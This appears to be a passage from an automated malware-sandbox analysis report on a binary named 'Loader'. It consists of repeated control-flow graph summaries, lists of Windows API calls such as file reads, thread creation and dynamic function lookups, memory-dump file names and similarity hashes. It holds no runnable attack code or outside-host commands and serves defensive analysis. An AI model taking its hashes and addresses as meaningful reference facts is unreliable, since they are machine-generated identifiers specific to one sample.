                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1b26c971121ab4dd77ebf9eadb2bb79780d6fcf51aed24fbd0958306f2c8e739
                                                                                              • Instruction ID: 8651329ef928e949c968b30757e4b303980b4a64989e74ee025b6147429eaf02
                                                                                              • Opcode Fuzzy Hash: 1b26c971121ab4dd77ebf9eadb2bb79780d6fcf51aed24fbd0958306f2c8e739
                                                                                              • Instruction Fuzzy Hash: AF0119749043188FC714DF69D885BD9F7F0EB18710F0085A9A888A7350EB74AAC4CF85

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 26 e69dd3-e69ddf 27 e69e71-e69e74 26->27 28 e69de4-e69df5 27->28 29 e69e7a 27->29 31 e69df7-e69dfa 28->31 32 e69e02-e69e1b LoadLibraryExW 28->32 30 e69e7c-e69e80 29->30 33 e69e00 31->33 34 e69e9a-e69e9c 31->34 35 e69e81-e69e91 32->35 36 e69e1d-e69e26 GetLastError 32->36 38 e69e6e 33->38 34->30 35->34 37 e69e93-e69e94 FreeLibrary 35->37 39 e69e5f-e69e6c 36->39 40 e69e28-e69e3a call e6bc93 36->40 37->34 38->27 39->38 40->39 43 e69e3c-e69e4e call e6bc93 40->43 43->39 46 e69e50-e69e5d LoadLibraryExW 43->46 46->35 46->39
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,4E40E4DF,?,00E69EE2,?,?,00000000), ref: 00E69E94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-$ext-ms-
                                                                                              • API String ID: 3664257935-537541572
                                                                                              • Opcode ID: 57e128ee5b7dcd990c9153f98a6cd99a081d52cf77e27c5918d30c5a6d21e380
                                                                                              • Instruction ID: 3817fd8cbcf287283d7c8c41830ce9fb65a4bc51142c785279cfe11eb54ad8fb
                                                                                              • Opcode Fuzzy Hash: 57e128ee5b7dcd990c9153f98a6cd99a081d52cf77e27c5918d30c5a6d21e380
                                                                                              • Instruction Fuzzy Hash: 4221F632A80210ABD721D761BC44B5A779CEF517F4F251120E91AB7293E732ED05C6D0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 47 e5beb0-e5bf22 CreateFileA 48 e5bf29-e5bf37 47->48 49 e5bff2-e5c00c 48->49 50 e5bf3d-e5bf4a 48->50 51 e5c16a 49->51 53 e5c021-e5c054 GetFileSize 50->53 54 e5bf50-e5bf5d 50->54 51->48 53->51 56 e5bf63-e5bf70 54->56 57 e5c078-e5c0ce call e64233 ReadFile 54->57 60 e5bf76-e5bf83 56->60 61 e5c011-e5c01c 56->61 57->51 64 e5c12c-e5c146 CloseHandle 60->64 65 e5bf89-e5bf96 60->65 61->51 64->51 67 e5c0f6-e5c108 call e6423c 65->67 68 e5bf9c-e5bfa9 65->68 67->51 71 e5c0d3-e5c0f1 68->71 72 e5bfaf-e5bfbc 68->72 71->51 75 e5bfc2-e5bfcf 72->75 76 e5c059-e5c073 CloseHandle 72->76 78 e5bfd5-e5bfe2 75->78 79 e5c14b-e5c169 call e64241 75->79 76->51 82 e5c10d-e5c127 CloseHandle 78->82 83 e5bfe8-e5bfed 78->83 82->51 83->51
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 35b78fca9dbe761150e3591292dee4e84fa833d45b8d5fe823879bafee3d9aab
                                                                                              • Instruction ID: 94a4561da6a39d916d572393f0ffe9d0e6d070f86d706900331692e78ebe245c
                                                                                              • Opcode Fuzzy Hash: 35b78fca9dbe761150e3591292dee4e84fa833d45b8d5fe823879bafee3d9aab
                                                                                              • Instruction Fuzzy Hash: CD7139B4A05209DFCB04DFACD9686AEBBF0EF48701F209919E856BB351D73499488F51

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(?,?,Function_00016E00,00000000,?,?), ref: 00E66D2F
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,00E63BEA), ref: 00E66D3B
                                                                                              • __dosmaperr.LIBCMT ref: 00E66D42
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorLastThread__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 2744730728-0
                                                                                              • Opcode ID: 7b1a3cee3eefc68a7fc338840473203a7c5b32f2c06365007f0492f580a94e4b
                                                                                              • Instruction ID: 14600b4d9f825030ba083c43dcc9e6872ab956e0ed7c1e36cc2422707342f56e
                                                                                              • Opcode Fuzzy Hash: 7b1a3cee3eefc68a7fc338840473203a7c5b32f2c06365007f0492f580a94e4b
                                                                                              • Instruction Fuzzy Hash: EE017172650209BFDF15AFA0EC05AEE3BA9EF407E8F105158F801B6161DB71EE50DB91

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000002,?,00E670B1,00E683A0,00E683A0,?,00000002,4E40E4DF,00E683A0,00000002), ref: 00E67000
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00E670B1,00E683A0,00E683A0,?,00000002,4E40E4DF,00E683A0,00000002), ref: 00E67007
                                                                                              • ExitProcess.KERNEL32 ref: 00E67019
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: f4f4b66a97dcdc30245a75e20328bbb13254a369e3542014cef68ea2ac965f08
                                                                                              • Instruction ID: 5d640a74abecc52bbfa5f6e6b9435d7e7b60ed4c558c9e520f13639c99795842
                                                                                              • Opcode Fuzzy Hash: f4f4b66a97dcdc30245a75e20328bbb13254a369e3542014cef68ea2ac965f08
                                                                                              • Instruction Fuzzy Hash: AED09231044108BFCF116F62FC4D88D3F6ABF54395B149010F91DAA172DB35D99ADBA0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 113 e6a732-e6a737 114 e6a739-e6a751 113->114 115 e6a753-e6a757 114->115 116 e6a75f-e6a768 114->116 115->116 117 e6a759-e6a75d 115->117 118 e6a77a 116->118 119 e6a76a-e6a76d 116->119 120 e6a7d4-e6a7d8 117->120 123 e6a77c-e6a789 GetStdHandle 118->123 121 e6a776-e6a778 119->121 122 e6a76f-e6a774 119->122 120->114 124 e6a7de-e6a7e1 120->124 121->123 122->123 125 e6a7b6-e6a7c8 123->125 126 e6a78b-e6a78d 123->126 125->120 128 e6a7ca-e6a7cd 125->128 126->125 127 e6a78f-e6a798 GetFileType 126->127 127->125 129 e6a79a-e6a7a3 127->129 128->120 130 e6a7a5-e6a7a9 129->130 131 e6a7ab-e6a7ae 129->131 130->120 131->120 132 e6a7b0-e6a7b4 131->132 132->120
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00E6A621,00E7A088,0000000C), ref: 00E6A77E
                                                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00E6A621,00E7A088,0000000C), ref: 00E6A790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleType
                                                                                              • String ID:
                                                                                              • API String ID: 3000768030-0
                                                                                              • Opcode ID: 5199057bf536cc19722aadf05b69d709d4dceb9fd976a0f22f1b769bf20e2568
                                                                                              • Instruction ID: 74849466449c1f89ce62ed718a8f519ba3f0ce40746c29ab4c6f24b77111f8d1
                                                                                              • Opcode Fuzzy Hash: 5199057bf536cc19722aadf05b69d709d4dceb9fd976a0f22f1b769bf20e2568
                                                                                              • Instruction Fuzzy Hash: 8111D8719447414ACB308E3EEC885227EB45B563B4B3C172BD1B6B65F2C634F986EA42

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00E79D20,0000000C), ref: 00E66E13
                                                                                              • ExitThread.KERNEL32 ref: 00E66E1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorExitLastThread
                                                                                              • String ID:
                                                                                              • API String ID: 1611280651-0
                                                                                              • Opcode ID: 7981aef083249434d0e18d13a527079468dc7de50fbd883fb2d25350da8f0469
                                                                                              • Instruction ID: 182a1e0d89779b449125305ee10998916aaf9d7590f83bef54b360990afad062
                                                                                              • Opcode Fuzzy Hash: 7981aef083249434d0e18d13a527079468dc7de50fbd883fb2d25350da8f0469
                                                                                              • Instruction Fuzzy Hash: AEF0C271A80204AFDB00BFB0E84AA2E3BB6FF40750F105549F005BB2A2DB715941CB91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 153 e6b0cb-e6b0d4 154 e6b0d6-e6b0e9 RtlFreeHeap 153->154 155 e6b103-e6b104 153->155 154->155 156 e6b0eb-e6b102 GetLastError call e6b7a0 call e6b757 154->156 156->155
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00E6BC39,?,00000000,?,?,00E6BB55,?,00000007,?,?,00E6C16E,?,?), ref: 00E6B0E1
                                                                                              • GetLastError.KERNEL32(?,?,00E6BC39,?,00000000,?,?,00E6BB55,?,00000007,?,?,00E6C16E,?,?), ref: 00E6B0EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 485612231-0
                                                                                              • Opcode ID: 407177c4cf227758fb73226bb1a76635c0920dabd38d67468b6a7909982fa858
                                                                                              • Instruction ID: f9ad84b6f6e022bae307444d8ab016ca6f356b5e1fbe5f7d7fe5b29431f5a9eb
                                                                                              • Opcode Fuzzy Hash: 407177c4cf227758fb73226bb1a76635c0920dabd38d67468b6a7909982fa858
                                                                                              • Instruction Fuzzy Hash: 51E08C32580208ABCB216BA1FC0DB993B9DAF84399F100061F60CF6062DB3099C2C784

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 238 e63b60-e63be5 call e5e940 call e63cc0 call e63dc0 call e66ce6 246 e63bea-e63bf7 238->246 247 e63bfe-e63c0c 246->247 248 e63c55-e63c6b 247->248 249 e63c12-e63c1f 247->249 250 e63cb5 248->250 252 e63c84-e63c95 call e6441d 249->252 253 e63c25-e63c32 249->253 250->247 256 e63c9a-e63cb2 call e63e30 call e64241 252->256 253->256 257 e63c38-e63c45 253->257 260 e63c70-e63c7f call e63de0 257->260 261 e63c4b-e63c50 257->261 260->250 261->250
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 90aee893c2075a345ba059dec8b4c0e53c39456dc0871975df79afbfe0503035
                                                                                              • Instruction ID: d60b2136458cc5a9882d5ad9a836445a4464039ef764fd62a650f1d74be9993a
                                                                                              • Opcode Fuzzy Hash: 90aee893c2075a345ba059dec8b4c0e53c39456dc0871975df79afbfe0503035
                                                                                              • Instruction Fuzzy Hash: BE31AEB4E442098BCB04DFB9E5946AEFBF0EB48384F10942AE456BB350DB359A05CF65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 268 e69e9e-e69ec8 269 e69ece-e69ed0 268->269 270 e69eca-e69ecc 268->270 272 e69ed6-e69edd call e69dd3 269->272 273 e69ed2-e69ed4 269->273 271 e69f1f-e69f22 270->271 275 e69ee2-e69ee6 272->275 273->271 276 e69f05-e69f1c 275->276 277 e69ee8-e69ef6 GetProcAddress 275->277 279 e69f1e 276->279 277->276 278 e69ef8-e69f03 call e66ad0 277->278 278->279 279->271
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cafd18b090bc3701ac292ae0dbf459244eaac3ac003bb319ac8d43c249b2a480
                                                                                              • Instruction ID: ee9a07eb21b2d987e5686c078895bb0a0949139fe31b3a94394e11546997a1a2
                                                                                              • Opcode Fuzzy Hash: cafd18b090bc3701ac292ae0dbf459244eaac3ac003bb319ac8d43c249b2a480
                                                                                              • Instruction Fuzzy Hash: 6C01F5333442159F8B12CF6AFC44A6677AEFB803A47295024FA18FB156FB31D84497D0

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateElliptic
                                                                                              • String ID:
                                                                                              • API String ID: 1611293138-0
                                                                                              • Opcode ID: 4a3ef4788289e4143827c8cbfc75783d2a9930d4631eefb3877575cdb7b24fcf
                                                                                              • Instruction ID: fe7a834d2f0f51271de295e681c832e218eae51ac380bf2cf0a94441ce89e9f4
                                                                                              • Opcode Fuzzy Hash: 4a3ef4788289e4143827c8cbfc75783d2a9930d4631eefb3877575cdb7b24fcf
                                                                                              • Instruction Fuzzy Hash: 5111D3B0D003099FCB04EFA9C4597AEBBF1EF48304F508819D855A7350EB74A648CB91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 291 e6bc45-e6bc51 292 e6bc83-e6bc8e call e6b757 291->292 293 e6bc53-e6bc55 291->293 300 e6bc90-e6bc92 292->300 295 e6bc57-e6bc58 293->295 296 e6bc6e-e6bc7f RtlAllocateHeap 293->296 295->296 297 e6bc81 296->297 298 e6bc5a-e6bc61 call e68327 296->298 297->300 298->292 303 e6bc63-e6bc6c call e67207 298->303 303->292 303->296
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E641E0,?,?,00E61007,?,00E5FAB5), ref: 00E6BC77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 56e719aa9757fc101d2a949cc364666b778eb0ea18a0b250453205b317f6e0be
                                                                                              • Instruction ID: b8a15dfb74863ae3584cbb9ae2f069094c32371573b264f5fa8b9dde175a9588
                                                                                              • Opcode Fuzzy Hash: 56e719aa9757fc101d2a949cc364666b778eb0ea18a0b250453205b317f6e0be
                                                                                              • Instruction Fuzzy Hash: 8AE0E5311C06115BD6312622FC05B9FBA8C9F813F8F153221BC14F6191DF20CEC081A0
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E64CB6
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E64CC4
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E64CD5
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E64CE6
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E64CF7
                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E64D08
                                                                                              • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00E64D19
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E64D2A
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00E64D3B
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E64D4C
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E64D5D
                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E64D6E
                                                                                              • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E64D7F
                                                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E64D90
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E64DA1
                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E64DB2
                                                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E64DC3
                                                                                              • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E64DD4
                                                                                              • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00E64DE5
                                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00E64DF6
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00E64E07
                                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00E64E18
                                                                                              • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00E64E29
                                                                                              • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00E64E3A
                                                                                              • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00E64E4B
                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00E64E5C
                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E64E6D
                                                                                              • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00E64E7E
                                                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E64E8F
                                                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E64EA0
                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00E64EB1
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E64EC2
                                                                                              • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00E64ED3
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E64EE4
                                                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00E64EF5
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00E64F06
                                                                                              • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00E64F17
                                                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00E64F28
                                                                                              • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00E64F39
                                                                                              • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00E64F4A
                                                                                              • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00E64F5B
                                                                                              Strings
                                                                                              Memory Dump Source
